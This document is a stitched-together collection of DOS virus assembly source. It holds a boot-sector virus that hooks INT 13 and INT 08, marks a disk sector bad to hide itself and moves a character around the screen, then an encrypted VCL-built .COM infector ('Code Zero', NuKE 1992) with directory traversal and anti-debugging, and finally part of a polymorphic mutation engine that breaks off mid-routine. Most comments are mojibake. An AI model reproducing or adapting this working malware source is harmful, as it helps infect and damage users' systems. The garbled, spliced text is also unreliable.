074h,073h,07Fh,092h,07Ch,089h,0B3h,081h,05Fh,093h,072h,066h,07Ah db 08Eh,07Eh,089h,094h,080h,07Eh,09Fh,098h,064h,088h, slutt: size equ $-100h pgf equ ($+16)/16 done BIOS_SEG SEGMENT at 0h org 0020h D0020 dw 0 D0022 dw 0 INTERR8 label far org 004Ch D004C dw 0 D004E dw 0 org 0413h D0413 dw 0 BIOS_SEG ends BOOT_SEG SEGMENT at 7Ch org 0 BOOT_PROCESS label far BOOT_SEG ends DISK_ROM SEGMENT at 0C800h org 256h C800_SEG label far DISK_ROM ends SEG0000 segment public para 'CODE' assume CS:SEG0000, ds:SEG0000 ;***********************************************************; ; ÅÜÉéê æàèÆÄÉ - ìÇùÇïÄ ìÇ éêÉôæÇ ; ; ìÇîêÉÇ æà ìÇ boot sector ìÇ äêæèÇ ; ;***********************************************************; ; Æ│¬ áñ░Ñ▒║▓ Ñ 0000:7C00 ¿½¿ 07C0:0000 ; ORG 7C00h JMP short L7C1E D7C02 db 90h db 'IBM 3.1' DB 0 DB 2 D7C0D DB 2 D7C0E DW 1 DB 2 DB 70h DB 0 D7C13 DW 2D0h DB 0FDh DB 2 DB 0 D7C18 DW 9 ;Sector per track - SecPTrk D7C1A DW 2 ;Side per track - SidPTrk D7C1C DW 0 L7C1E: XOR AX,AX MOV SS,AX MOV SP,7C00h MOV DS,AX assume ds:BIOS_SEG MOV AX,Word Ptr D0413 ;ìá¼á½┐óá BIOS MEMSIZE ▒ 2 SUB AX,0002h MOV Word Ptr D0413,AX assume ds:SEG0000 MOV CL,06h SHL AX,CL SUB AX,07C0h MOV ES,AX ;ES: ▒Ñú¼Ñ¡▓á ¡á ºáÑ▓¿▓Ñ 2è »á¼Ñ▓ MOV SI,7C00h MOV DI,SI MOV CX,0100h REPZ MOVSW ;¼Ñ▒▓¿ ▒Ñ ▓á¼: ╢Ñ½¿┐▓ ▒Ñ¬▓«░ db 08Eh,0C8h ;MOV CS,AX ;»░Ññáóá │»░áó½Ñ¡¿Ñ▓« ¡á ¡«ó«▓« ¼┐▒▓« ;CS:7C00 - áñ░Ñ▒ ¡á ¡á╖á½«▓« ¡á ¬«ñá PUSH CS POP DS CALL L7C4A L7C4A: XOR AH,AH ;RESET ¡á INT 13 INT 13h AND Byte Ptr D7DF8,80h ;ô▒▓░«⌐▒▓ó«▓« Ñ »║░ó¿ ñ¿▒¬ (A: - floppy ; C: - hard MOV BX,Word Ptr D7DF9 ;ùÑ▓Ñ »║░ó¿┐▓ ▒Ñ¬▓«░, ¬║ñÑ▓« Ñ »░«ñ║½- PUSH CS ;ªÑ¡¿Ñ▓« POP AX SUB AX,0020h MOV ES,AX ;adres = (CS - 20h):8000h CALL L7C9D MOV BX,Word Ptr D7DF9 ;ùÑ▓Ñ ó▓«░¿┐▓ ▒Ñ¬▓«░ «▓ »░«ñ║½ªÑ¡¿Ñ▓« INC BX ; (¡«░¼á½¡¿┐▓ BOOT) MOV AX,0FFC0h ;adres = 0000:7C00 MOV ES,AX CALL L7C9D XOR AX,AX MOV Byte Ptr D7DF7,AL ;ù¿▒▓¿ ▒▓á▓│▒-íá⌐▓á (ºá »«▒½Ñ) MOV DS,AX assume ds:BIOS_SEG MOV AX,Word Ptr D004C ;çá¬á╖óá ▒Ñ ºá INT 13! MOV BX,Word Ptr D004E MOV Word Ptr D004C,offset NewINT13 MOV Word Ptr D004E,CS PUSH CS POP DS assume ds:SEG0000 MOV Word Ptr D7D2A,AX ;çá»áºóá ▒▓á░¿┐▓ áñ░Ñ▒ ¡á INT 13 MOV Word Ptr D7D2C,BX MOV DL,Byte Ptr D7DF8 ;éºÑ¼á │▒▓░«⌐▒▓ó«▓« ºá BOOT ¿ ▒▓á░▓¿░á jmp BOOT_PROCESS ;¡«░¼á½¡¿┐▓ BOOT process ;================================================================; ; ÅÉÄâÉÇîÇ çÇ ùàÆàìà (L7C9D) ê çÇÅêæ (L7C98) ; ; ìÇ ïÄâêùàæèê æàèÆÄÉ ÄÆ äêæè ; ;----------------------------------------------------------------; ; BX - ▒Ñ¬▓«░ «▓¡«▒¡« ¡á╖á½«▓«, ¬«⌐▓« ▓░┐íóá ñá ▒Ñ »░«╖Ñ▓Ñ ; ; ES:8000 - áñ░Ñ▒, ¬║ñÑ▓« ñá ▒Ñ »░«╖Ñ▓Ñ ▒Ñ¬▓«░║▓ ; ; ; ; D7DF8 - │▒▓░«⌐▒▓ó«, «▓ ¬«Ñ▓« ╖Ñ▓Ñ ; ; ; ;================================================================; L7C98: MOV AX,0301h JMP short L7CA0 L7C9D: MOV AX,0201h L7CA0: XCHG BX,AX ADD AX,Word Ptr D7C1C XOR DX,DX DIV Word Ptr D7C18 ;»░Ñó░║╣á ½«ú¿╖Ñ▒¬¿┐▓ ▒Ñ¬▓«░ ó AX INC DL ; (0-7..) ó║ó Track, Side, Sector MOV CH,DL ;ó ░Ñú¿▒▓░¿▓Ñ CX, DX (ºá INT 13) XOR DX,DX DIV Word Ptr D7C1A MOV CL,06h SHL AH,CL OR AH,CH MOV CX,AX XCHG CH,CL MOV DH,DL MOV AX,BX L7CC3: MOV DL,Byte Ptr D7DF8 ;óºÑ¼á ¡«¼Ñ░á ¡á ñ¿▒¬á ºá ╖Ñ▓Ñ¡Ñ (A:) MOV BX,8000h INT 13h JNC L7CCF POP AX ;▒¬á»óá ▒▓Ñ¬á ¿ ºáú¿óá, á¬« ¿¼á I/O err L7CCF: RET ;========================================================================; ; ÆÇçê ÅÉÄâÉÇîÇ æà éÉÜçéÇ ìÇ îƒæÆÄÆÄ ìÇ êæÆêìæèêƒÆ INT 13 ; ;========================================================================; NewINT13: PUSH DS ;çá»áºóá ░Ñú¿▒▓░¿▓Ñ PUSH ES PUSH AX PUSH BX PUSH CX PUSH DX PUSH CS ;Ä»░áó┐ ▒ó«┐ DS ¿ ES POP DS PUSH CS POP ES TEST Byte Ptr D7DF7,01h ;Ç¬« Ñ 1 - ó║º»░«¿ºóÑªñá¡Ñ ¡á ó¿░│▒á, JNE L7D23 ; «▓¿óá ñá »¿╕Ñ ▒║▒ ▒▓á¡ñá░▓. INT 13 CMP AH,02h ;ùÑ▓Ñ¡Ñ ¡á ▒Ñ¬▓«░? JNE L7D23 ;ìÑ, »░«ñ║½ªáóá ▒║▒ ▒▓á¡ñá░▓¡¿┐▓ INT 13 CMP Byte Ptr D7DF8,DL ;ô▒▓░«⌐▒▓ó«▓« ▒║ó»áñá ▒ »«▒½Ññ¡«▓« MOV Byte Ptr D7DF8,DL ; ▒ ¬«Ñ▓« Ñ ░áí«▓Ñ¡« JNE L7D12 ;ìÑ XOR AH,AH ;éºÑ¼á ó░Ñ¼Ñ▓« INT 1Ah TEST DH,7Fh ;í¿▓ 8000 ¡á low order part = 1? JNE L7D03 ;ñá, »░Ñ▒¬á╖á TEST DL,0F0h ;í¿▓«óÑ 00F0 ¡á low order part = 1? JNE L7D03 ;ñá, »░Ñ▒¬á╖á ;Å░«┐óá: ¬«úá▓« TIMER .and. 80F0h == 0 ;Å░¿í½¿º¿▓Ñ½¡« ¡á 1800 ▒Ñ¬. = 30 ¼¿¡. PUSH DX call L7EB3 ;Å░«┐óá ¡á ó¿░│▒á - ▒¬á╖á »« Ñ¬░á¡á POP DX L7D03: MOV CX,DX ;Ä»░ÑñÑ½┐ ▓░┐íóá ½¿ ñá ºá░áº┐óá SUB DX,Word Ptr D7EB0 ; (»«ñ╡«ñ┐╣ ¼«¼Ñ¡▓ ó░Ñ¼Ñ) MOV Word Ptr D7EB0,CX SUB DX,+24h JC L7D23 L7D12: OR Byte Ptr D7DF7,01h ;æ▓á░▓¿░á ó║º»░«¿ºóÑªñá¡Ñ/ºá░áº┐óá¡Ñ PUSH SI PUSH DI CALL L7D2E POP DI POP SI AND Byte Ptr D7DF7,0FEh L7D23: POP DX ;é║º▒▓á¡«ó┐óá »«▓░Ñí¿▓Ñ½▒¬¿▓Ñ ░Ñú¿▒▓░¿ POP CX POP BX POP AX POP ES POP DS D7D2A = $+1 D7D2C = $+3 jmp c800_SEG ;æ▓á░▓¿░á ¿▒▓¿¡▒¬¿┐▓ INT 13 ;================================================================; ; éÜçÅÉÄêçéàåäÇìà ìÇ éêÉôæÇ ê çÇÉÇçƒéÇìà ìÇ ÅÉÄâÉÇîÇ ; ;================================================================; L7D2E: MOV AX,0201h ;ùÑ▓Ñ BOOT sector «▓ ñ¿▒¬á MOV DH,00h ; BX = ?????????????????????? ¬║ñÑ, íÑ! MOV CX,0001h CALL L7CC3 TEST Byte Ptr D7DF8,80h ;HARD DISK? JE L7D63 ;¡Ñ ;---- HARD DISK ----; MOV SI,81BEh ;Æ║░▒¿ DOS partition MOV CX,0004h L7D46: CMP Byte Ptr [SI+04h],01h JE L7D58 CMP Byte Ptr [SI+04h],04h JE L7D58 ADD SI,+10h LOOP L7D46 RET ;¡┐¼á DOS partition, ¡Ñ ºá░áº┐óá ;---- ìá¼Ñ░Ñ¡ Ñ DOS partition ----; L7D58: MOV DX,Word Ptr [SI] MOV CX,Word Ptr [SI+02h] MOV AX,0201h CALL L7CC3 ;ùÑ▓Ñ BOOT sector «▓ DOS partition ;---- Æ│¬ ¿ñóá á¬« Ñ ñ¿▒¬Ñ▓á, »░«╖Ñ▓Ñ¡ Ñ BOOT sector ----; L7D63: MOV SI,8002h MOV DI,offset D7C02 MOV CX,001Ch REPZ MOVSB ;¼Ñ▒▓¿ BPB ▓áí½¿╢á▓á «▓ BOOT sector CMP Word Ptr D8000+01FCh,1357h ;çá░áºÑ¡ ½¿ Ñ ñ¿▒¬á? JNE L7D8B ;¡Ñ CMP Byte Ptr D8000+01FBh,00h ;è║ñÑ ½¿ ▒«╖¿ DS? JNC L7D8A ;---- ä¿▒¬á Ñ ºá░áºÑ¡ ----; ;---- Æ│¬ ¼á⌐ ¡┐¼á ñá ñ«⌐ñÑ ¡¿¬«úá? ----; MOV AX,Word Ptr D8000+01F5h ;ü«ªá ░áí«▓á... MOV Word Ptr D7DF5,AX MOV SI,Word Ptr D8000+01F9h jmp L7E92 L7D8A: RET ;------------------- ; äêæèÇ ìà à çÇÉÇçàì, ÅÄùéÇ çÇÉÇçƒéÇìàÆÄ ; L7D8B: CMP Word Ptr D8000+000Bh,0200h ;Æ«óá ¡Ñ Ñ ¿¡▓Ñ░Ñ▒¡« JNE L7D8A CMP Byte Ptr D8000+000Dh,02h JC L7D8A MOV CX,Word Ptr D8000+000Eh MOV AL,Byte Ptr D8000+0010h CBW MUL Word Ptr D8000+0016h ADD CX,AX MOV AX,0020h MUL Word Ptr D8000+0011h ADD AX,01FFh MOV BX,0200h DIV BX ADD CX,AX MOV Word Ptr D7DF5,CX MOV AX,Word Ptr D7C13 SUB AX,Word Ptr D7DF5 MOV BL,Byte Ptr D7C0D XOR DX,DX XOR BH,BH DIV BX INC AX MOV DI,AX AND Byte Ptr D7DF7,0FBh CMP AX,0FF0h JBE L7DE0 OR Byte Ptr D7DF7,04h L7DE0: MOV SI,0001h MOV BX,Word Ptr D7C0E DEC BX MOV Word Ptr D7DF3,BX MOV Byte Ptr D7EB2,0FEh JMP short L7E00 D7DF3 DW 1 D7DF5 DW 000Ch D7DF7 DB 1 ;▒▓á▓│▒-íá⌐▓: ; 0000 0001 - ▒▓á░▓¿░á¡« Ñ ó║º»░«¿ºóÑªñá¡Ñ ; 0000 0010 - ºá¬á╖Ñ¡ Ñ ¡á INT 08 ; 0000 0100 D7DF8 DB 00 ;│▒▓░«⌐▒▓ó«: 0 - A:, 1 - B:, ... D7DF9 DW 274h ;½«ú¿╖Ñ▒¬¿ ▒Ñ¬▓«░, ¬║ñÑ▓« Ñ ºá»¿▒á¡« »░«ñ║½ªÑ¡¿Ñ▓« DB 00 DW 1357h ;êìäêèÇÆÄÉ çÇ çÇÉÇçàì äêæè!!!!!!!! DW 0AA55h ;¡«░¼á½Ñ¡ BOOT ▒Ñ¬▓«░ ;***********************************************************; ; éÆÄÉê æàèÆÄÉ - ÅÉÄäÜïåàìêà ìÇ éêÉôæÇ ; ; ìÇîêÉÇ æà ìÇ bad sector ìÇéÜÆÉà é äêæèÇ ; ;***********************************************************; L7E00: INC Word Ptr D7DF3 MOV BX,Word Ptr D7DF3 ADD Byte Ptr D7EB2,02h call L7C9D JMP short L7E4B L7E12: MOV AX,0003h TEST Byte Ptr D7DF7,04h JE L7E1D INC AX L7E1D: MUL SI SHR AX,1 SUB AH,Byte Ptr D7EB2 MOV BX,AX CMP BX,01FFh JNC L7E00 MOV DX,Word Ptr D8000[BX] TEST Byte Ptr D7DF7,04h JNE L7E45 MOV CL,04h TEST SI,0001h JE L7E42 SHR DX,CL L7E42: AND DH,0Fh L7E45: TEST DX,0FFFFh JE L7E51 L7E4B: INC SI CMP SI,DI JBE L7E12 RET L7E51: MOV DX,0FFF7h TEST Byte Ptr D7DF7,04h JNE L7E68 AND DH,0Fh MOV CL,04h TEST SI,0001h JE L7E68 SHL DX,CL L7E68: OR Word Ptr D8000[BX],DX MOV BX,Word Ptr D7DF3 call L7C98 MOV AX,SI SUB AX,0002h MOV BL,Byte Ptr D7C0D XOR BH,BH MUL BX ADD AX,Word Ptr D7DF5 MOV SI,AX MOV BX,0000h call L7C9D MOV BX,SI INC BX call L7C98 L7E92: MOV BX,SI MOV Word Ptr D7DF9,SI PUSH CS POP AX SUB AX,0020h MOV ES,AX call L7C98 PUSH CS POP AX SUB AX,0040h MOV ES,AX MOV BX,0000h call L7C98 RET D7EB0 DW 0EEF0h D7EB2 DB 0 ;=======================================================; ; çÇèÇùéÇìà çÇ int 08, ÇèÄ ìà à çÇèÇùàìÇ ; ;=======================================================; L7EB3: TEST Byte Ptr D7DF7,02h JNE L7EDE OR Byte Ptr D7DF7,02h assume ds:BIOS_SEG MOV AX,0000h ;çá¬á╖óá ▒Ñ ¡á INT 8 MOV DS,AX MOV AX,Word Ptr D0020 MOV BX,Word Ptr D0022 MOV Word Ptr D0020,offset NewINT08 MOV Word Ptr D0022,CS assume ds:SEG0000 PUSH CS POP DS MOV Word Ptr D7FC9,AX ;çá»áºóá ▒▓á░¿┐▓ INT 8 MOV Word Ptr D7FCB,BX L7EDE: RET ;=====================================================================; ; ÆÇçê ÅÉÄâÉÇîÇ æà éÉÜçéÇ ìÇ îƒæÆÄÆÄ ìÇ êæÆêìæèêƒÆ int 08 ; ;=====================================================================; NewINT08: PUSH DS ;çá»áºóá »«▓░Ñí¿▓Ñ½▒¬¿▓Ñ ░Ñú¿▒▓░¿ PUSH AX PUSH BX PUSH CX PUSH DX PUSH CS ;Ä»░áó┐ ▒«í▒▓óÑ¡¿┐▓ DS POP DS MOV AH,0Fh ;Get current video mode INT 10h MOV BL,AL CMP BX,Word Ptr D7FD4 ;mode = ▒▓á░¿┐▓ mode JE L7F27 ;ñá, »░«ñ║½ªáóá ;---- ÉÑª¿¼║▓ ¡á ñ¿▒»½Ñ⌐ Ñ »░«¼Ñ¡Ñ¡. ô▒▓á¡«ó┐ó┐ ¡«ó¿┐▓ ░Ñª¿¼ ----; MOV Word Ptr D7FD4,BX ;ºá»¿▒óá ▒▓░á¡¿╢á▓á ¿ mode DEC AH MOV Byte Ptr D7FD6,AH ;ºá»áºóá char_per_line-1 MOV AH,01h CMP BL,07h ;mode = text b/w MGA, EGA? JNE L7F05 ;¡Ñ DEC AH L7F05: CMP BL,04h ;mode = graphics? JNC L7F0C ;ñá DEC AH L7F0C: MOV Byte Ptr D7FD3,AH MOV Word Ptr D7FCF,0101h MOV Word Ptr D7FD1,0101h MOV AH,03h ;Read cursor position and size INT 10h PUSH DX ;çá»áºóá »«º¿╢¿┐▓á ¡á ¬│░▒«░á MOV DX,Word Ptr D7FCF JMP short L7F4A ;---- ÉÑª¿¼║▓ ¡á ñ¿▒»½Ñ┐ (mode) ¡Ñ Ñ »░«¼Ñ¡┐¡ ----; L7F27: MOV AH,03h ;Read cursor position and size INT 10h PUSH DX ;çá»áºóá cursor pos & size MOV AH,02h ;Set cursor position MOV DX,Word Ptr D7FCF INT 10h MOV AX,Word Ptr D7FCD ;Ä»░ÑñÑ½┐ ¬á¬ó« ñá »¿╕Ñ »« Ñ¬░á¡á CMP Byte Ptr D7FD3,01h ;mode = GRAPF? JNE L7F41 ;¡Ñ MOV AX,8307h L7F41: MOV BL,AH ;Write character & attribute MOV CX,0001h MOV AH,09h INT 10h ;---- è«░¿ú¿░á »«º¿╢¿┐▓á ¡á ¬│░▒«░á ----; L7F4A: MOV CX,Word Ptr D7FD1 CMP DH,00h ;Up JNE L7F58 XOR CH,0FFh INC CH L7F58: CMP DH,18h ;Down JNE L7F62 XOR CH,0FFh INC CH L7F62: CMP DL,00h ;Left JNE L7F6C XOR CL,0FFh INC CL L7F6C: CMP DL,Byte Ptr D7FD6 ;Right JNE L7F77 XOR CL,0FFh INC CL L7F77: CMP CX,Word Ptr D7FD1 JNE L7F94 MOV AX,Word Ptr D7FCD AND AL,07h CMP AL,03h JNE L7F8B XOR CH,0FFh INC CH L7F8B: CMP AL,05h JNE L7F94 XOR CL,0FFh INC CL L7F94: ADD DL,CL ADD DH,CH MOV Word Ptr D7FD1,CX MOV Word Ptr D7FCF,DX MOV AH,02h INT 10h ;Set cursor position MOV AH,08h ;Read character & attribute INT 10h MOV Word Ptr D7FCD,AX MOV BL,AH CMP Byte Ptr D7FD3,01h ;mode = GRAPH? JNE L7FB6 ;¡Ñ MOV BL,83h L7FB6: MOV CX,0001h ;Write character & attribute MOV AX,0907h INT 10h POP DX ;Restore cursor position MOV AH,02h INT 10h POP DX ;é║º▒▓á¡«ó┐óá »«▓░Ñí¿▓Ñ½▒¬¿▓Ñ ░Ñú¿▒▓░¿ POP CX POP BX POP AX POP DS D7FC9 = $+1 D7FCB = $+3 JMP INTERR8 ;Ä▓¿óá ¡á ¿▒▓¿¡▒¬¿┐▓ INT 08 D7FCD DW 0 D7FCF DW 0101h ;Éáí«▓¡á »«º¿╢¿┐ ¡á Ñ¬░á¡á ¡á ó¿░│▒á D7FD1 DW 0101h D7FD3 DB 0 ; 1 - mode = graph, b800 ; 0 - mode = text, b800 ;-1 - mode = 7, text b/w EGA,HGA D7FD4 DW 0FFFFh ;▒á¼¿┐▓ mode D7FD6 DB 50h ;í░«⌐ ▒¿¼ó«½¿ ¡á ░Ññ DB 0B7h,0B7h,0B7h,0B6h,040h,040h,088h,0DEh DB 0E6h,05Ah,0ACh,0D2h,0E4h,0EAh,0E6h,040h DB 050h,0ECh,040h,064h,05Ch,060h,052h,040h DB 040h,040h,040h,064h,062h,05Eh,062h,060h DB 05Eh,070h,06Eh,040h,041h,0B7h,0B7h,0B7h DB 0B6h ;************************************************************* ; ÉÇüÄÆìÇ ÄüïÇæÆ ìÇ éêÉôæÇ D8000 = $ SEG0000 ends END done virus_type equ 0 ; Appending Virus is_encrypted equ 1 ; We're encrypted tsr_virus equ 0 ; We're not TSR code segment byte public assume cs:code,ds:code,es:code,ss:code org 0100h main proc near db 0E9h,00h,00h ; Near jump (for compatibility) start: call find_offset ; Like a PUSH IP find_offset: pop bp ; BP holds old IP sub bp,offset find_offset ; Adjust for length of host call encrypt_decrypt ; Decrypt the virus start_of_code label near lea si,[bp + buffer] ; SI points to original start mov di,0100h ; Push 0100h on to stack for push di ; return to main program movsw ; Copy the first two bytes movsb ; Copy the third byte mov di,bp ; DI points to start of virus mov bp,sp ; BP points to stack sub sp,128 ; Allocate 128 bytes on stack mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer on stack int 021h stop_tracing: mov cx,09EBh mov ax,0FE05h ; Acutal move, plus a HaLT jmp $-2 add ah,03Bh ; AH now equals 025h jmp $-10 ; Execute the HaLT lea bx,[di + null_vector] ; BX points to new routine push cs ; Transfer CS into ES pop es ; using a PUSH/POP int 021h mov al,1 ; Disable interrupt 1, too int 021h jmp short skip_null ; Hop over the loop null_vector: jmp $ ; An infinite loop skip_null: mov byte ptr [di + lock_keys + 1],130 ; Prefetch unchanged lock_keys: mov al,128 ; Change here screws DEBUG out 021h,al ; If tracing then lock keyboard call search_files ; Find and infect a file call infected_all or ax,ax ; Did the function return zero? jne skip00 ; If not equal, skip effect jmp short strt00 ; Success -- skip jump skip00: jmp end00 ; Skip the routine strt00: lea si,[di + data00] ; SI points to data mov ah,0Eh ; BIOS display char. function display_loop: lodsb ; Load the next char. into AL or al,al ; Is the character a null? je disp_strnend ; If it is, exit int 010h ; BIOS video interrupt jmp short display_loop ; Do the next character disp_strnend: end00: com_end: pop dx ; DX holds original DTA address mov ah,01Ah ; DOS set DTA function int 021h mov sp,bp ; Deallocate local buffer xor ax,ax ; mov bx,ax ; mov cx,ax ; mov dx,ax ; Empty out the registers mov si,ax ; mov di,ax ; mov bp,ax ; ret ; Return to original program main endp db 064h,06Dh,056h,0D5h,05Dh search_files proc near push bp ; Save BP mov bp,sp ; BP points to local buffer sub sp,64 ; Allocate 64 bytes on stack mov ah,047h ; DOS get current dir function xor dl,dl ; DL holds drive # (current) lea si,[bp - 64] ; SI points to 64-byte buffer int 021h mov ah,03Bh ; DOS change directory function lea dx,[di + root] ; DX points to root directory int 021h call traverse ; Start the traversal mov ah,03Bh ; DOS change directory function lea dx,[bp - 64] ; DX points to old directory int 021h mov sp,bp ; Restore old stack pointer pop bp ; Restore BP ret ; Return to caller root db "\",0 ; Root directory search_files endp traverse proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first function mov cx,00010000b ; CX holds search attributes lea dx,[di + all_files] ; DX points to "*.*" int 021h jc leave_traverse ; Leave if no files present check_dir: cmp byte ptr [bp - 107],16 ; Is the file a directory? jne another_dir ; If not, try again cmp byte ptr [bp - 98],'.' ; Did we get a "." or ".."? je another_dir ;If so, keep going mov ah,03Bh ; DOS change directory function lea dx,[bp - 98] ; DX points to new directory int 021h call traverse ; Recursively call ourself pushf ; Save the flags mov ah,03Bh ; DOS change directory function lea dx,[di + up_dir] ; DX points to parent directory int 021h popf ; Restore the flags jnc done_searching ; If we infected then exit another_dir: mov ah,04Fh ; DOS find next function int 021h jnc check_dir ; If found check the file leave_traverse: lea dx,[di + com_mask] ; DX points to "*.COM" call find_files ; Try to infect a file done_searching: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller up_dir db "..",0 ; Parent directory name all_files db "*.*",0 ; Directories to search for com_mask db "*.COM",0 ; Mask for all .COM files traverse endp db 0D9h,013h,047h,056h,001h find_files proc near push bp ; Save BP mov ah,02Fh ; DOS get DTA function int 021h push bx ; Save old DTA address mov bp,sp ; BP points to local buffer sub sp,128 ; Allocate 128 bytes on stack push dx ; Save file mask mov ah,01Ah ; DOS set DTA function lea dx,[bp - 128] ; DX points to buffer int 021h mov ah,04Eh ; DOS find first file function mov cx,00100111b ; CX holds all file attributes pop dx ; Restore file mask find_a_file: int 021h jc done_finding ; Exit if no files found call infect_file ; Infect the file! jnc done_finding ; Exit if no error mov ah,04Fh ; DOS find next file function jmp short find_a_file ; Try finding another file done_finding: mov sp,bp ; Restore old stack frame mov ah,01Ah ; DOS set DTA function pop dx ; Retrieve old DTA address int 021h pop bp ; Restore BP ret ; Return to caller find_files endp db 005h,083h,072h,0C1h,006h infect_file proc near mov ah,02Fh ; DOS get DTA address function int 021h mov si,bx ; SI points to the DTA mov byte ptr [di + set_carry],0 ; Assume we'll fail cmp word ptr [si + 01Ah],(65279 - (finish - start)) jbe size_ok ; If it's small enough continue jmp infection_done ; Otherwise exit size_ok: mov ax,03D00h ; DOS open file function, r/o lea dx,[si + 01Eh] ; DX points to file name int 021h xchg bx,ax ; BX holds file handle mov ah,03Fh ; DOS read from file function mov cx,3 ; CX holds bytes to read (3) lea dx,[di + buffer] ; DX points to buffer int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h xchg dx,ax ; Faster than a PUSH AX mov ah,03Eh ; DOS close file function int 021h xchg dx,ax ; Faster than a POP AX sub ax,finish - start + 3 ; Adjust AX for a valid jump cmp word ptr [di + buffer + 1],ax ; Is there a JMP yet? je infection_done ; If equal then exit mov byte ptr [di + set_carry],1 ; Success -- the file is OK add ax,finish - start ; Re-adjust to make the jump mov word ptr [di + new_jump + 1],ax ; Construct jump mov ax,04301h ; DOS set file attrib. function xor cx,cx ; Clear all attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h mov ax,03D02h ; DOS open file function, r/w int 021h xchg bx,ax ; BX holds file handle mov ah,040h ; DOS write to file function mov cx,3 ; CX holds bytes to write (3) lea dx,[di + new_jump] ; DX points to the jump we made int 021h mov ax,04202h ; DOS file seek function, EOF cwd ; Zero DX _ Zero bytes from end mov cx,dx ; Zero CX / int 021h push si ; Save SI through call call encrypt_code ; Write an encrypted copy pop si ; Restore SI mov ax,05701h ; DOS set file time function mov cx,[si + 016h] ; CX holds old file time mov dx,[si + 018h] ; DX holds old file date int 021h mov ah,03Eh ; DOS close file function int 021h mov ax,04301h ; DOS set file attrib. function xor ch,ch ; Clear CH for file attribute mov cl,[si + 015h] ; CX holds file's old attributes lea dx,[si + 01Eh] ; DX points to victim's name int 021h infection_done: cmp byte ptr [di + set_carry],1 ; Set carry flag if failed ret ; Return to caller set_carry db ? ; Set-carry-on-exit flag buffer db 090h,0CDh,020h ; Buffer to hold old three bytes new_jump db 0E9h,?,? ; New jump to virus infect_file endp db 06Ah,025h,0C8h,0A7h,094h infected_all proc near if virus_type eq 0 mov al,byte ptr [di + set_carry] else mov al,byte ptr [set_carry] ; AX holds success value endif cbw ; Sign-extend AL into AX ret ; Return to caller infected_all endp data00 db 7,7,7,"** CODE ZERO **",13,10,0 vcl_marker db "[VCL]",0 ; VCL creation marker note db "[Code Zero]",0 db "Nowhere Man, [NuKE] '92",0 encrypt_code proc near push bp ; Save BP mov bp,di ; Use BP as pointer to code lea si,[bp + encrypt_decrypt]; SI points to cipher routine xor ah,ah ; BIOS get time function int 01Ah mov word ptr [si + 9],dx ; Low word of timer is new key xor byte ptr [si + 1],8 ; xor byte ptr [si + 8],1 ; Change all SIs to DIs xor word ptr [si + 11],0101h; (and vice-versa) lea di,[bp + finish] ; Copy routine into heap mov cx,finish - encrypt_decrypt - 1 ; All but final RET push si ; Save SI for later push cx ; Save CX for later rep movsb ; Copy the bytes lea si,[bp + write_stuff] ; SI points to write stuff mov cx,5 ; CX holds length of write rep movsb ; Copy the bytes pop cx ; Restore CX pop si ; Restore SI inc cx ; Copy the RET also this time rep movsb ; Copy the routine again mov ah,040h ; DOS write to file function lea dx,[bp + start] ; DX points to virus lea si,[bp + finish] ; SI points to routine call si ; Encrypt/write/decrypt mov di,bp ; DI points to virus again pop bp ; Restore BP ret ; Return to caller write_stuff: mov cx,finish - start ; Length of code int 021h encrypt_code endp end_of_code label near encrypt_decrypt proc near lea si,[bp + start_of_code] ; SI points to code to decrypt mov cx,(end_of_code - start_of_code) / 2 ; CX holds length xor_loop: db 081h,034h,00h,00h ; XOR a word by the key inc si ; Do the next word inc si ; loop xor_loop ; Loop until we're through ret ; Return to caller encrypt_decrypt endp finish label near code ends end main done .radix 16 .model tiny .code org 100 timer equ 46C start: jmp prog v_entry: xchg ax,bp mov si,100 inc si add si,[si] mov di,si xor dx,dx mov cx,(top-encrypt)/2-1 push cx calcgen: xor dx,[si+encrypt-v_entry+2] org $-1 inc si inc si dec cx jns calcgen pop ax decrypt: xor [di+encrypt-v_entry+2],dx org $-1 inc di inc di dec ax jns decrypt encrypt: xchg si,si ;ÆÑº¿ ¿¡▒▓░│¬╢¿¿ ▒á ¡Ñ«í╡«ñ¿¼¿ xchg dx,dx add si,encrypt-top+2 dec dx ; Æ│¬ ▓░┐íóá ñá ▒Ñ ▒½«ª¿ ¿¡¿╢¿á½¿º¿░á╣á▓á ╖á▒▓ ¡á ó¿░│▒á. Åá░á¼Ñ▓░¿: ; DX = -¡«¼Ñ░ ¡á úÑ¡Ñ░á╢¿┐▓á ; SI = áñ░Ñ▒ ¡á Ñ▓¿¬Ñ▓á v_entry. ; . . . prog: push ds xor ax,ax mov ds,ax mov ax,ds:[timer] pop ds call mutate mov ax,4C00 int 21 ; Æáº¿ »«ñ»░«ú░á¼á ▒║ºñáóá ▒½│╖á⌐¡á ¼│▓á╢¿┐ ¡á ñÑ¬«ñ¿░á╣á▓á ╖á▒▓. Åá░á¼Ñ▓░¿: ; AX = ▒½│╖á⌐¡« ╖¿▒½« (óºÑ▓« «▓ 0:46C) mutate: cld xor dx,dx push cs pop ds mov cx,90 div cx call getcode mov ds:[15],al call getcode mov ds:[1E],al xchg ax,dx mov dl,6 div dl mov si,offset muttbl mov bx,offset xlatbl1 call buildblk mov [si],al inc si mov bx,offset xlatbl2 call buildblk2 mov bx,offset xlatbl3 call buildblk2 mov bx,offset muttbl-1 mov si,offset xlatdat mov cx,xlatbl1-xlatdat nextgen: lodsb test al,al jz cantchg push ax and al,111b xlat mov ah,0F8 xchg ax,dx pop ax push cx mov cl,3 shr al,cl jz skipxlat xlat shl al,cl jz skipxlat xlat shl al,cl or dl,al mov dh,0c0 skipxlat: pop cx and [si-(xlatdat+1-v_entry)],dh or [si-(xlatdat+1-v_entry)],dl cantchg: loop nextgen ret buildblk2: mov al,ah buildblk: shr al,1 mov dl,al push ax adc al,1 cmp al,3 jb setblk sub al,3 setblk: or dl,al xlat mov [si],al inc si pop ax xlat mov [si],al inc si 